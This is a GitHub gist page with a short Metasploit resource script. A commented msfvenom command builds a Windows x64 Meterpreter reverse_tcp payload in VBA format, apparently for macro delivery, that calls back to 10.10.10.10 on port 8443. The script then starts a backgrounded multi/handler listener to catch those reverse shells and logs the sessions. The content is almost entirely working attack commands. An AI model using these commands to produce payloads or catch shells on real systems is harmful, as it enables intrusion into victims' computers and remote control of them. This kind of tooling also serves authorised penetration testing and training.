Skip to content

Instantly share code, notes, and snippets.

@sasqwatch
Created April 11, 2019 22:16
Show Gist options
  • Save sasqwatch/d0be09dc765bdf3f4c59af87fd368f0c to your computer and use it in GitHub Desktop.
Save sasqwatch/d0be09dc765bdf3f4c59af87fd368f0c to your computer and use it in GitHub Desktop.
Metasploit Simple Config
# Resource Script
# Build Your Payload
# msfvenom --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=8443 --format vba > vba3.txt
# msfconsole -r setup.rc
spool /root/msflog.log
set consolelogging true
set loglevel 5
set sessionlogging true
set timestampoutput true
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.10
set lport 8443
set exitonsession false
exploit -j -z
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment